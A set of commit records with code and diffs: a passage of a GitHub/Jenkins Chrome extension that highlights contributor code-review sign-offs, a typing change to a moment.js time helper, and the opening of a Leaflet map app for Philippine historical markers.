= document.getElementsByClassName("pull-header-username")[0].innerText.trim(); } var issueBody = "PR: [#" + pullNumber + "](" + url + ") *" + pullTitle + "* by @" + pullAuthor + "\r\n"; issueBody = issueBody + "Failure: " + _testFailUrl + "\r\n\r\n"; var htmlDescription = ""; var issueDescription = "<description>"; if (jenkinsShowFailureIndications) { if (jenkinsShowTestFailures) { for (var i = 0; i < aelements.length; i++) { var aelement = aelements[i]; if (aelement.innerText == "Test Result" && aelement.parentNode.tagName == "TD") { var unitTestFailures = aelement.parentNode.getElementsByTagName("li"); if (unitTestFailures.length > 0) { if (unitTestFailures.length <= 10) { htmlDescription = htmlDescription + "<b>" + unitTestFailures.length + " Test Failures:</b><br />"; issueBody = issueBody + "**" + unitTestFailures.length + " Test Failures:**\r\n"; } else { htmlDescription = htmlDescription + "<b>" + unitTestFailures.length + " Test Failures:</b> (showing first 10)<br />"; issueBody = issueBody + "**" + unitTestFailures.length + " Test Failures:** (showing first 10)\r\n"; } } for (var j = 0; j < unitTestFailures.length && j < 10; j++) { var unitTestFailure = unitTestFailures[j]; htmlDescription = htmlDescription + "&nbsp;&nbsp;&nbsp;&nbsp;" + unitTestFailure.innerText + "<br />"; issueBody = issueBody + unitTestFailure.innerText + "\r\n"; } htmlDescription = htmlDescription + "<br />"; issueBody = issueBody + "\r\n"; } } } var count = 1; for (var i = 0; i < h2elements.length; i++) { var h2 = h2elements[i]; if (h2.innerHTML == "HTTP ERROR 404") { htmlDescription = htmlDescription + "404: Build details page could not be found."; issueDescription = "404: Build details page could not be found."; } if (h2.innerHTML == "Identified problems") { var nodeWithErrorSiblings = h2.parentNode.parentNode; var errorRow = nodeWithErrorSiblings; while ((errorRow = errorRow.nextSibling) != null) { if (count > 1) { issueBody = issueBody + "\r\n\r\n"; htmlDescription = htmlDescription + "<br /><br />"; } var failureTitle = ""; var failureDescription = ""; var h3s = errorRow.getElementsByTagName("h3"); var h4s = errorRow.getElementsByTagName("h4"); if (h3s.length > 0) { failureTitle = h3s[0].innerHTML.split("<br")[0].trim(); failureDescription = h3s[0].getElementsByTagName("b")[0].innerHTML.trim(); } else if (h4s.length > 0) { failureTitle = h4s[0].innerHTML.trim(); failureDescription = h4s[1].innerHTML.trim(); } if (count == 1) { issueDescription = failureTitle; } issueBody = issueBody + "**Issue " + count + ": " + failureTitle + "**\r\n"; issueBody = issueBody + failureDescription; htmlDescription = htmlDescription + "<b>Issue " + count + ": " + failureTitle + "</b><br />" + failureDescription; count++; } } } if (count > 2) { issueDescription = issueDescription + " (+" + (count - 2) + " more)"; } if (count == 1) { // we failed to find the failure, or there was none. // should we add special handling here? } } var testQueueName = _testFailure.parentNode.getElementsByClassName("text-emphasized")[0].innerText.trim(); var issueTitle = "[Test Failure] " + issueDescription + " in " + testQueueName + " on PR #" + pullNumber; var issueCreationRouting = currentSettings[option_issueCreationRouting]; var issueRoutes = issueCreationRouting.trim().match(/[^\r\n]+/g); var targetOrg = currentPageOrg; var targetRepo = currentPageRepo; for (var routeNum = 0; routeNum < issueRoutes.length; routeNum++) { var routeParts = issueRoutes[routeNum].trim().split(":"); var fromParts = routeParts[0].trim().split("/"); var toParts = routeParts[1].trim().split("/"); if (fromParts.length == 2 && toParts.length == 2 && fromParts[0].trim() == currentPageOrg && fromParts[1].trim() == currentPageRepo) { targetOrg = toParts[0].trim(); targetRepo = toParts[1].trim(); break; } } var previousFailureUrl = _testFailUrl; var defaultIssueLabelsSpecs = currentSettings[option_defaultIssueLabels].trim().match((/[^\r\n]+/g)); log("Determining issue labels...") var labelsToUse = new Array(); for (var specNum = 0; specNum < defaultIssueLabelsSpecs.length; specNum++) { log(" Checking: " + defaultIssueLabelsSpecs[specNum]); var specParts = defaultIssueLabelsSpecs[specNum].trim().split(":"); var scopeParts = specParts[0].split("/"); var organization = scopeParts[0].trim(); if (organization == currentPageOrg) { if (scopeParts.length == 1 || scopeParts[1].trim() == currentPageRepo) { var labelList = specParts[1].trim().split(","); log(" Matches. Adding " + labelList.toString()); for (var labelNum = 0; labelNum < labelList.length; labelNum++) { labelName = labelList[labelNum].trim(); if (!(labelName in labelsToUse)) { log(" Actually adding: " + labelName); labelsToUse.push(labelName); } } } } } log("Calculated labelsToUse: " + labelsToUse); // "&labels[]=Area-Infrastructure&labels[]=Contributor%20Pain" var labelUrlPart = ""; if (labelsToUse.length > 0) { for (var labelNum = 0; labelNum < labelsToUse.length; labelNum++) { labelUrlPart = labelUrlPart + "&labels[]=" + labelsToUse[labelNum]; } } log("Constructed labels url part: " + labelUrlPart); var url = "https://github.com/" + targetOrg + "/" + targetRepo + "/issues/new?title=" + encodeURIComponent(issueTitle) + "&body=" + encodeURIComponent(issueBody) + labelUrlPart; var jobName = testQueueName; var retestButton = doc.createElement("input"); retestButton.setAttribute("type", "button"); retestButton.setAttribute("value", "Retest"); retestButton.setAttribute("name", "buttonname"); retestButton.onclick = (function () { var thisUrl = url; var thisJobName = jobName; var thisPreviousFailureUrl = previousFailureUrl; return function () { log("Finding retest text"); var rerunTextEntries = currentSettings[option_testRerunText].trim().match((/[^\r\n]+/g)); // * = 1, org = 2, repo = 3 var bestMatchLevel = 0; var descriptor = "retest {0} please"; for (var rerunTextNum = 0; rerunTextNum < rerunTextEntries.length; rerunTextNum++) { log(" Considering " + rerunTextEntries[rerunTextNum].trim()); var rerunEntryParts = rerunTextEntries[rerunTextNum].trim().split(":"); var scope = rerunEntryParts[0].trim(); var matchLevel = 0; var entryMatches = false; if (scope == "*") { matchLevel = 1; entryMatches = true; } else if (scope.indexOf("/") == -1) { matchLevel = 2; entryMatches = scope == currentPageOrg; } else { matchLevel = 3; var org = scope.split("/")[0]; var repo = scope.split("/")[1]; entryMatches = org == currentPageOrg && repo == currentPageRepo; } log(" Matches / Level: " + entryMatches + "/" + matchLevel); if (entryMatches && matchLevel > bestMatchLevel) { var descriptor = rerunEntryParts[1].trim(); log(" Setting new best match to: " + descriptor); } } log("Best-match retest text: " + descriptor); var commentText = ""; if (descriptor.indexOf("{0}") == -1) { commentText = descriptor; log(" No placeholder, so commentText is " + commentText); } else { var placeholderLocation = descriptor.indexOf("{0}"); var commentTextStart = descriptor.substr(0, placeholderLocation); var commentTextEnd = descriptor.substr(placeholderLocation + "{0}".length); var commentText = commentTextStart + thisJobName + commentTextEnd; log(" commentText with filled placeholder is " + commentText); } commentText = commentText + "\n// Previous failure: " + thisPreviousFailureUrl + "\n// Retest reason: "; $("#new_comment_field").val(commentText); var offset = $("#new_comment_field").offset(); offset.left -= 20; offset.top -= 20; $('html, body').animate({ scrollTop: offset.top, scrollLeft: offset.left }); $("#new_comment_field").stop().css("background-color", "#FFFF9C") .animate({ backgroundColor: "#FFFFFF" }, 1500); }; })(); retestButton.className = "btn btn-sm " + stashPopClassName + " " + jenkinsReloadableInfoClassName; retestButton.style.margin = "0px 0px 3px 0px"; if (jenkinsShowRetestButton) { _testFailure.parentNode.insertBefore(retestButton, _testFailure.parentNode.firstChild); } var button = doc.createElement("input"); button.setAttribute("type", "button"); button.setAttribute("value", "Create Issue"); button.setAttribute("name", "buttonname"); button.onclick = (function () { var thisUrl = url; return function () { window.open(thisUrl); }; })(); button.className = "btn btn-sm " + stashPopClassName + " " + jenkinsReloadableInfoClassName; button.style.margin = "0px 0px 3px 0px"; if (jenkinsShowBugFilingButton) { _testFailure.parentNode.insertBefore(button, _testFailure.parentNode.firstChild); } if (jenkinsShowFailureIndications) { executeCallbackIfPermissionPresent(_testFailUrl, function () { var div = doc.createElement("div"); if (typeof htmlDescription === "undefined" || htmlDescription == "") { htmlDescription = "Unknown Failure - If this is a private Jenkins job, click the 'Details' button to reauthenticate and then reload this failure data."; } div.innerHTML = htmlDescription.trim(); div.style.backgroundColor = "#FFAAAA"; div.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; _testFailure.parentNode.appendChild(div); }); } $("." + _specificClassNameForJenkinsFailureRedAreaLoader).remove(); callbackWhenTestProcessed(_queueName, _testFailUrl, htmlDescription, _specificClassNameForPRListFailure); }); })(testFailure, testFailUrl, specificClassNameForPRListFailure, specificClassNameForJenkinsFailureRedAreaLoader, queueName); } } function makeBuildStatusWindowsBig() { var lists = document.getElementsByClassName("build-statuses-list"); for (var i = 0; i < lists.length; i++) { lists[i].style.maxHeight = "5000px"; } } function addJenkinsRefreshButton(currentSettings) { var lists = $(".build-statuses-list"); for (var i = 0; i < lists.length; i++) { var list = lists[i]; var a = document.createElement("a"); a.href = "#"; a.className = stashPopClassName + " " + jenkinsReloadableInfoClassName + " jenkinsreload"; a.text = "Reload Jenkins data"; list.previousSibling.previousSibling.appendChild(a); } $('.jenkinsreload').click(function (e) { e.preventDefault(); reloadJenkins(currentSettings); }); } function normalizeAndRemoveUrlParameters(str) { str = stripFragment(str); str = stripQueryString(str); return stripTrailingSlash(str); } function stripTrailingSlash(str) { return str.substr(-1) === '/' ? str.substring(0, str.length - 1) : str; } function stripQueryString(str) { return str.indexOf('?') >= 0 ? str.substring(0, str.indexOf('?')) : str; } function stripFragment(str) { return str.indexOf('#') >= 0 ? str.substring(0, str.indexOf('#')) : str; } function inlineFailureInfoToPRList(title, className, i, currentSettings) { var clickToLoadText = title.getElementsByClassName(className)[0]; if (typeof clickToLoadText === "undefined") { // Already expanded. Don't re-expand. return; } $("." + className).remove(); log("Inlining Jenkins failures to PR list for " + className + " (position " + i + " on this page)"); // On github.com/pulls there are two "issue-title-link" elements. var thisFailureUrl = title.getElementsByClassName("issue-title-link js-navigation-open")[0].href; log("thisFailureUrl:" + thisFailureUrl); executeCallbackIfUrlAccessGranted(thisFailureUrl, function () { var redDiv = document.createElement("div"); redDiv.style.backgroundColor = "#FFAAAA"; redDiv.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; var loading = document.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var prLoadingDiv = document.createElement("div"); prLoadingDiv.style.backgroundColor = "#FFAAAA"; prLoadingDiv.style.color = "#000000"; prLoadingDiv.appendChild(loading); var t = document.createTextNode("Loading PR contents..."); prLoadingDiv.appendChild(t); var specificClassName = stashPopClassName + "_LoadPRContents_" + i; prLoadingDiv.className = specificClassName; redDiv.appendChild(prLoadingDiv); (function (_thisFailureUrl, _divToAddTo, _prLoadingDiv) { chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: _thisFailureUrl, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); processTestFailures( doc, _prLoadingDiv, i, true, true, true, true, function (failurequeue, detailsurl, resultstr, classNameToPlaseResultsIn) { var divToPlaceResultsIn = document.getElementsByClassName(classNameToPlaseResultsIn)[0]; while (divToPlaceResultsIn.firstChild) { divToPlaceResultsIn.removeChild(divToPlaceResultsIn.firstChild); } var _individualFailureDiv = document.createElement("div"); var _span = document.createElement("span"); _span.innerHTML = "<b><u>" + failurequeue + "</u></b> <a href = '" + encodeURI(detailsurl) + "' target='_blank'>Details</a><br />"; _individualFailureDiv.appendChild(_span); var _nestedDiv = document.createElement("div"); _nestedDiv.style.padding = "0px 0px 0px 30px"; var _span2 = document.createElement("span"); _span2.innerHTML = resultstr + "<br /><br />"; _nestedDiv.appendChild(_span2); _individualFailureDiv.appendChild(_nestedDiv); _individualFailureDiv.style.color = "#000000"; divToPlaceResultsIn.appendChild(_individualFailureDiv); }, currentSettings); }); })(thisFailureUrl, redDiv, prLoadingDiv); title.appendChild(redDiv); }); } function executeCallbackIfPermissionPresent(url, callback) { log("Checking access for " + url + "..."); chrome.runtime.sendMessage({ method: "checkOriginAccess", keys: [url] }, function (response) { if (response) { log(" Permission present. Executing callback."); callback(); } else { log(" Permission missing."); } }); } function executeCallbackIfPermissionMissing(url, callback) { log("Checking access for " + url + "..."); chrome.runtime.sendMessage({ method: "checkOriginAccess", keys: [url] }, function (response) { if (response) { log(" Permission present."); } else { log(" Permission missing. Executing callback."); callback(); } }); } function openJenkinsDetailsInNewTab(currentSettings) { var detailsLinks = document.getElementsByClassName("build-status-details"); for (var i = 0; i < detailsLinks.length; i++) { var detailsLink = detailsLinks[i]; detailsLink.target = "_blank"; (function (_detailsLink) { executeCallbackIfPermissionMissing( detailsLink.href, function () { var grantAccessLink = createRequestJenkinsAccessLinkWithCallbackIfAllowed( _detailsLink.href, function () { reloadJenkins(false, currentSettings); return false; }); grantAccessLink.className = "build-status-details right"; _detailsLink.parentNode.insertBefore(grantAccessLink, _detailsLink.nextSibling); }) })(detailsLink); } } function addCodeReviewSummaryAndButtons(codeReviewOptions) { var splitCodeOptions = codeReviewOptions.split(";"); var positiveIndicatorsString = splitCodeOptions[1].trim(); var negativeIndicatorsString = splitCodeOptions[2].trim(); var testedIndicatorsString = splitCodeOptions[3].trim(); if (positiveIndicatorsString.length == 0 && negativeIndicatorsString.length == 0 && testedIndicatorsString.length == 0) { log("Empty code review options. Bail.") return; } // Buttons var btnList = document.getElementById("partial-new-comment-form-actions"); var text = document.createElement("font"); text.color = "#666666"; text.textContent = "Code Review: "; btnList.appendChild(text); var positiveIndicators = positiveIndicatorsString.split(","); var negativeIndicators = negativeIndicatorsString.split(","); var testedIndicators = testedIndicatorsString.split(","); if (positiveIndicatorsString.length > 0) { btnList.appendChild(createCommentSettingLink("Approve", positiveIndicators[0], "#00aa00")); } if (negativeIndicatorsString.length > 0) { btnList.appendChild(createCommentSettingLink("Reject", negativeIndicators[0], "#aa0000")); } if (testedIndicatorsString.length > 0) { btnList.appendChild(createCommentSettingLink("Tested", testedIndicators[0])); } // Reviews var positiveReviews = new Array(); var negativeReviews = new Array(); var testReviews = new Array(); var comments = document.getElementsByClassName("timeline-comment-wrapper"); for (var i = 0; i < comments.length; i++) { var comment = comments[i]; if (comment.classList.contains("timeline-new-content")) { continue; } // TODO: exclude "email-hidden-reply", example https://github.com/mono/mono/pull/2420 var body = comment.children[1].getElementsByClassName("js-comment-body")[0]; if (typeof body !== "undefined") { var bodyHtml = body.innerHTML; if (positiveIndicatorsString.length > 0) { for (var c = 0; c < positiveIndicators.length; c++) { if (bodyHtml.indexOf(positiveIndicators[c]) >= 0) { positiveReviews.push(comment); break; } } } if (negativeIndicatorsString.length > 0) { for (var c = 0; c < negativeIndicators.length; c++) { if (bodyHtml.indexOf(negativeIndicators[c]) >= 0) { negativeReviews.push(comment); break; } } } if (testedIndicatorsString.length > 0) { for (var c = 0; c < testedIndicators.length; c++) { if (bodyHtml.indexOf(testedIndicators[c]) >= 0) { testReviews.push(comment); break; } } } } } if (positiveReviews.length > 0 || negativeReviews.length > 0 || testReviews.length > 0) { var reviewsContainer = document.createElement("div"); reviewsContainer.setAttribute("class", stashPopClassName); if (positiveReviews.length > 0) { addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Approvals", positiveReviews, "#77ff77"); } if (negativeReviews.length > 0) { addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Rejections", negativeReviews, "#ff7777"); } if (testReviews.length > 0) { addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Tested by", testReviews, "#77ccff"); } var discussion = document.getElementsByClassName("js-discussion")[0]; discussion.insertBefore(reviewsContainer, discussion.firstChild); } } function getBestCodeReviewOptions(codeReviewOptions) { var codeReviewOptionsEntries = codeReviewOptions.trim().match((/[^\r\n]+/g)); log("Calculating best matching code review options"); // * = 1, org = 2, repo = 3 var bestMatchLevel = 0; for (var i = 0; i < codeReviewOptionsEntries.length; i++) { log(" Considering " + codeReviewOptionsEntries[i].trim()); var rerunEntryParts = codeReviewOptionsEntries[i].trim().split(";"); var scope = rerunEntryParts[0].trim(); var matchLevel = 0; var entryMatches = false; if (scope == "*") { matchLevel = 1; entryMatches = true; } else if (scope.indexOf("/") == -1) { matchLevel = 2; entryMatches = scope == currentPageOrg; } else { matchLevel = 3; var org = scope.split("/")[0]; var repo = scope.split("/")[1]; entryMatches = org == currentPageOrg && repo == currentPageRepo; } log(" Matches / Level: " + entryMatches + "/" + matchLevel); if (entryMatches && matchLevel > bestMatchLevel) { var bestMatch = codeReviewOptionsEntries[i].trim(); log(" Setting new best match to: " + bestMatch); } } log("Best-match code review options: " + bestMatch); return bestMatch; } function addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, title, reviews, backgroundColor) { var titleDiv = document.createElement("div"); var titleText = document.createElement("b"); titleText.textContent = title + ": "; titleDiv.appendChild(titleText); titleDiv.style.cssFloat = "left"; titleDiv.style.display = "block"; reviewsContainer.appendChild(titleDiv); var reviewListDiv = document.createElement("div"); reviewListDiv.style.cssFloat = "left"; reviewListDiv.style.display = "block"; for (var i = 0; i < reviews.length; i++) { var review = reviews[i]; var headerForBackground = review.getElementsByClassName("timeline-comment-header")[0]; headerForBackground.style.backgroundColor = backgroundColor; var header = review.getElementsByClassName("timeline-comment-header-text")[0]; var username = header.getElementsByTagName("strong")[0].innerText; var label = review.getElementsByClassName("timeline-comment-label")[0]; var labelPart = ""; if (typeof label !== "undefined") { var reviewerKind = label.innerText; labelPart = "<span class='timeline-comment-label' style='margin:0px;'>" + reviewerKind + "</span>"; } var time = review.getElementsByTagName("time")[0].innerText; var imgTag = review.children[0].children[0].cloneNode(); imgTag.className = "avatar"; imgTag.height = 24; imgTag.width = 24; // imgTag.style.marginLeft = "3px"; var tooltip = review.children[1].getElementsByClassName("js-comment-body")[0].innerHTML; var tooltipHeader = labelPart + "<p><b>" + username + "</b> commented " + time + "</p>"; imgTag.setAttribute("stashpop-title", tooltipHeader + tooltip); //var link = document.createElement("a"); ////link.className = "participant-avatar tooltipped tooltipped-s"; //// link.setAttribute("aria-label", tooltip); //link.href = "#"; //link.appendChild(imgTag); imgTag.role = "button"; imgTag.style.cursor = "pointer"; imgTag.style.margin = "0px 0px 3px 3px"; var clickLocation = "#" + header.getElementsByClassName("timestamp")[0].href.split("#")[1]; (function (newLocation) { imgTag.onclick = function () { // todo: navigation doesn't work if location.hash == newLocation location.hash = newLocation; }; })(clickLocation); reviewListDiv.appendChild(imgTag); if (i % 10 == 9) { reviewListDiv.appendChild(document.createElement("br")); } } reviewsContainer.appendChild(reviewListDiv); var clearDiv = document.createElement("div"); clearDiv.style.clear = "both"; reviewsContainer.appendChild(clearDiv); } function sendmultimail(issuesList, isPull) { var baseUrl = document.getElementsByClassName("entry-title")[0].getElementsByTagName('strong')[0].getElementsByTagName('a')[0].href; baseUrl = baseUrl + (isPull ? "/pull/" : "/issues/"); var owner = document.getElementsByClassName("entry-title")[0].getElementsByClassName("author")[0].getElementsByTagName("span")[0].innerHTML; var repo = document.getElementsByClassName("entry-title")[0].getElementsByTagName("strong")[0].getElementsByTagName("a")[0].innerHTML; var body = ""; var shortBody = ""; var count = 0; var singleIssueNumber = ""; var singleIssueTitle = ""; for (var i = 0; i < issuesList.children.length; i++) { if (issuesList.children[i].classList.contains("selected")) { count++; var issue = issuesList.children[i]; var title = issue.getElementsByClassName("issue-title")[0]; var urlParts = title.getElementsByClassName("issue-title-link")[0].href.split("/"); var issueNumber = urlParts[urlParts.length - 1].trim(); var issueTitle = title.getElementsByClassName("issue-title-link")[0].innerHTML.trim(); singleIssueNumber = issueNumber; singleIssueTitle = issueTitle; // TODO: Fetch the target branch of each PR. body = body + issueTitle + " " + baseUrl + issueNumber + "\r\n"; shortBody = shortBody + "#" + issueNumber + ": " + issueTitle + "\r\n"; } } if (count == 1) { sendmail(singleIssueNumber, singleIssueTitle, isPull); return; } var subject = owner + "/" + repo + ": " + count + " Selected " + (isPull ? "PRs" : "Issues"); body = body + "\r\n\r\n"; // TODO: Assigned to, etc. shortBody = shortBody + "\r\n\r\n"; // TODO: Assigned to, etc. var isPublic = (typeof document.getElementsByClassName("entry-title private")[0] === "undefined"); if (!isPublic) { body = body + "Notice: This message contains information about a private repository." shortBody = shortBody + "Notice: This message contains information about a private repository." } var decodedSubject = $('<div/>').html(subject).text(); var decodedBody = $('<div/>').html(body).text(); var decodedShortBody = $('<div/>').html(shortBody).text(); var finalFullMailToUrl = "mailto:?subject=" + encodeURIComponent(decodedSubject) + "&body=" + encodeURIComponent(decodedBody); var finalShortMailToUrl = "mailto:?subject=" + encodeURIComponent(decodedSubject) + "&body=" + encodeURIComponent(decodedShortBody); if (finalFullMailToUrl.length <= 2083) { window.location.href = finalFullMailToUrl; } else if (finalShortMailToUrl.length <= 2083) { window.location.href = finalShortMailToUrl; window.alert("issue links omitted to fit within the maximum mailto url length"); } else { window.alert("mailto maximum url length exceeded, choose fewer items"); } } function sendmail(issueNumber, issueTitle, isPull) { issueTitle = issueTitle.trim(); issueNumber = issueNumber.trim(); var baseUrl = document.getElementsByClassName("entry-title")[0].getElementsByTagName('strong')[0].getElementsByTagName('a')[0].href; var kind = isPull ? "PR" : "Issue"; baseUrl = baseUrl + (isPull ? "/pull/" : "/issues/"); var owner = document.getElementsByClassName("entry-title")[0].getElementsByClassName("author")[0].getElementsByTagName("span")[0].innerHTML; var repo = document.getElementsByClassName("entry-title")[0].getElementsByTagName("strong")[0].getElementsByTagName("a")[0].innerHTML; var targetBranchDisplay = ""; if (isPull) { if (isListPage) { // The PR list page contains no information about target branch, so we have to go look it up. var url = "https://github.com/" + currentPageOrg + "/" + currentPageRepo + "/pull/" + issueNumber; chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: url, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); var fullTargetBranchSpec = doc.getElementsByClassName("current-branch")[0].innerText; log("PR target branch (from individual PR page): " + fullTargetBranchSpec); finishIt(fullTargetBranchSpec); }); } else { var targetFullBranchSpecParts = $(".current-branch").first().text().split(":"); var targetBranch = targetFullBranchSpecParts.length == 1 ? targetFullBranchSpecParts[0] : targetFullBranchSpecParts[1]; log("PR target branch: " + targetBranch); if (targetBranch != "master" && targetBranch != "") { targetBranchDisplay = "/" + targetBranch; log("PR target branch display: " + targetBranchDisplay); } } } var subject = owner + "/" + repo + targetBranchDisplay + " " + kind + " #" + issueNumber + ": " + issueTitle; var body = baseUrl + issueNumber + "\r\n\r\n"; // TODO: Assigned to, etc. var isPublic = (typeof document.getElementsByClassName("entry-title private")[0] === "undefined"); if (!isPublic) { body = body + "Notice: This message contains information about a private repository." } var decodedSubject = $('<div/>').html(subject).text(); var decodedBody = $('<div/>').html(body).text(); window.location.href = "mailto:?subject=" + encodeURIComponent(decodedSubject) + "&body=" + encodeURIComponent(decodedBody); }
Make contributor signoffs more obvious than non-contributors
content.js
Make contributor signoffs more obvious than non-contributors
<ide><path>ontent.js <ide> reviewsContainer.setAttribute("class", stashPopClassName); <ide> <ide> if (positiveReviews.length > 0) { <del> addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Approvals", positiveReviews, "#77ff77"); <add> addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Approvals", positiveReviews, "#77ff77", "#edffed", "#00cc00"); <ide> } <ide> <ide> if (negativeReviews.length > 0) { <del> addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Rejections", negativeReviews, "#ff7777"); <add> addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Rejections", negativeReviews, "#ff7777", "#ffedf6", "#cc0000"); <ide> } <ide> <ide> if (testReviews.length > 0) { <del> addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Tested by", testReviews, "#77ccff"); <add> addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Tested by", testReviews, "#77ccff", "#dff6ff", "#0000cc"); <ide> } <ide> <ide> var discussion = document.getElementsByClassName("js-discussion")[0]; <ide> return bestMatch; <ide> } <ide> <del>function addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, title, reviews, backgroundColor) { <add>function addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, title, reviews, contributorBackgroundColor, externalBackgroundColor, contributorAggregationBackground) { <ide> var titleDiv = document.createElement("div"); <ide> var titleText = document.createElement("b"); <ide> titleText.textContent = title + ": "; <ide> reviewListDiv.style.cssFloat = "left"; <ide> reviewListDiv.style.display = "block"; <ide> <add> var commentsFromContributors = new Array(); <add> var commentsFromNonContributors = new Array(); <add> <ide> for (var i = 0; i < reviews.length; i++) { <ide> var review = reviews[i]; <del> <del> var headerForBackground = review.getElementsByClassName("timeline-comment-header")[0]; <del> headerForBackground.style.backgroundColor = backgroundColor; <ide> <ide> var header = review.getElementsByClassName("timeline-comment-header-text")[0]; <ide> var username = header.getElementsByTagName("strong")[0].innerText; <ide> labelPart = "<span class='timeline-comment-label' style='margin:0px;'>" + reviewerKind + "</span>"; <ide> } <ide> <add> var headerForBackground = review.getElementsByClassName("timeline-comment-header")[0]; <add> headerForBackground.style.backgroundColor = (labelPart == "" ? externalBackgroundColor : contributorBackgroundColor); <add> <ide> var time = review.getElementsByTagName("time")[0].innerText; <ide> <ide> var imgTag = review.children[0].children[0].cloneNode(); <ide> imgTag.className = "avatar"; <del> imgTag.height = 24; <del> imgTag.width = 24; <del> // imgTag.style.marginLeft = "3px"; <add> imgTag.height = 35; <add> imgTag.width = 35; <add> imgTag.style.backgroundColor = (labelPart == "" ? "#C8C8C8" : contributorAggregationBackground); <add> imgTag.style.padding = "3px"; <ide> <ide> var tooltip = review.children[1].getElementsByClassName("js-comment-body")[0].innerHTML; <ide> var tooltipHeader = labelPart + "<p><b>" + username + "</b> commented " + time + "</p>"; <ide> imgTag.setAttribute("stashpop-title", tooltipHeader + tooltip); <del> //var link = document.createElement("a"); <del> ////link.className = "participant-avatar tooltipped tooltipped-s"; <del> //// link.setAttribute("aria-label", tooltip); <del> //link.href = "#"; <del> <del> //link.appendChild(imgTag); <del> <ide> imgTag.role = "button"; <ide> imgTag.style.cursor = "pointer"; <ide> imgTag.style.margin = "0px 0px 3px 3px"; <ide> }; <ide> })(clickLocation); <ide> <del> reviewListDiv.appendChild(imgTag); <add> if (labelPart == "") { <add> commentsFromNonContributors.push(imgTag); <add> } else { <add> commentsFromContributors.push(imgTag); <add> } <add> } <add> <add> var allComments = commentsFromContributors.concat(commentsFromNonContributors); <add> for (var i = 0; i < allComments.length; i++) { <add> reviewListDiv.appendChild(allComments[i]); <ide> <ide> if (i % 10 == 9) { <ide> reviewListDiv.appendChild(document.createElement("br"));
JavaScript
apache-2.0
78c82c772edadad3e5db19d9a4165fc3dcb10163
0
8845musign/hanten-timer
// @flow import moment from 'moment' export default class TimeUtil { static unix2mmss (unix: number): string { return moment(unix).format('mm:ss') } }
utils/Time.js
import moment from 'moment' export default class TimeUtil { static unix2mmss (unix) { return moment(unix).format('mm:ss') } }
Add typing
utils/Time.js
Add typing
<ide><path>tils/Time.js <add>// @flow <ide> import moment from 'moment' <ide> <ide> export default class TimeUtil { <del> static unix2mmss (unix) { <add> static unix2mmss (unix: number): string { <ide> return moment(unix).format('mm:ss') <ide> } <ide> }
JavaScript
mit
d7cec93e14d9e0df1a5f4ed6c10f6b16efbb25de
0
WMPH/eph-historical-markers-map,WMPH/eph-historical-markers-map
'use strict'; // Constants and fixed parameters const WDQS_API_URL = 'https://query.wikidata.org/sparql'; const COMMONS_WIKI_URL_PREF = 'https://commons.wikimedia.org/wiki/'; const COMMONS_API_URL = 'https://commons.wikimedia.org/w/api.php'; const YEAR_PRECISION = '9'; const PH_QID = 'Q928'; const REGION_QID = 'Q24698'; const PROVINCE_QID = 'Q24746'; const HUC_QID = 'Q29946056'; const CITY_QID = 'Q104157'; const ADMIN_QIDS = [REGION_QID, PROVINCE_QID, HUC_QID, CITY_QID]; const ADMIN_LEVELS = 4; const OSM_LAYER_URL = 'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png'; const OSM_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a>'; const CARTO_LAYER_URL = 'https://cartodb-basemaps-{s}.global.ssl.fastly.net/rastertiles/voyager_labels_under/{z}/{x}/{y}{r}.png'; const CARTO_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a> (data), <a href="https://carto.com/">CARTO</a> (style)'; const WIKI_LAYER_URL = 'https://maps.wikimedia.org/osm-intl/{z}/{x}/{y}{r}.png'; const WIKI_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a> (data), <a href="https://carto.com/">Wikimedia Foundation</a> (style)'; const TILE_LAYER_MAX_ZOOM = 19; const MIN_PH_LAT = 4.5; const MAX_PH_LAT = 21.0; const MIN_PH_LON = 116.5; const MAX_PH_LON = 126.5; // Globals var Records = {}; // Main app database, keyed by QID var SparqlValuesClause; // SPARQL "VALUES" clause containing the QIDs of all main Wikidata items var Map; // Leaflet map object var Cluster; // Leaflet map cluster var BootstrapDataIsLoaded = false; // Whether the data needed to populate the map and index is loaded var PrimaryDataIsLoaded = false; // Whether the non-lazy data is loaded // ------------------------------------------------------------ window.addEventListener('load', init); // Initializes the app once the page has been loaded. function init() { initMap(); loadPrimaryData(); window.addEventListener('hashchange', processHashChange); Map.on('popupopen', function(e) { displayRecordDetails(e.popup._qid) }); } // Initializes the Leaflet-based map. function initMap() { // Create map and set initial view Map = new L.map('map'); Map.fitBounds([[MAX_PH_LAT, MAX_PH_LON], [MIN_PH_LAT, MIN_PH_LON]]); // Add tile layers let cartoLayer = new L.tileLayer(CARTO_LAYER_URL, { attribution : CARTO_LAYER_ATTRIBUTION, maxZoom : TILE_LAYER_MAX_ZOOM, }).addTo(Map); let wikiLayer = new L.tileLayer(WIKI_LAYER_URL, { attribution : WIKI_LAYER_ATTRIBUTION, maxZoom : TILE_LAYER_MAX_ZOOM, }); let osmLayer = new L.tileLayer(OSM_LAYER_URL, { attribution : OSM_LAYER_ATTRIBUTION, maxZoom : TILE_LAYER_MAX_ZOOM, }); let baseMaps 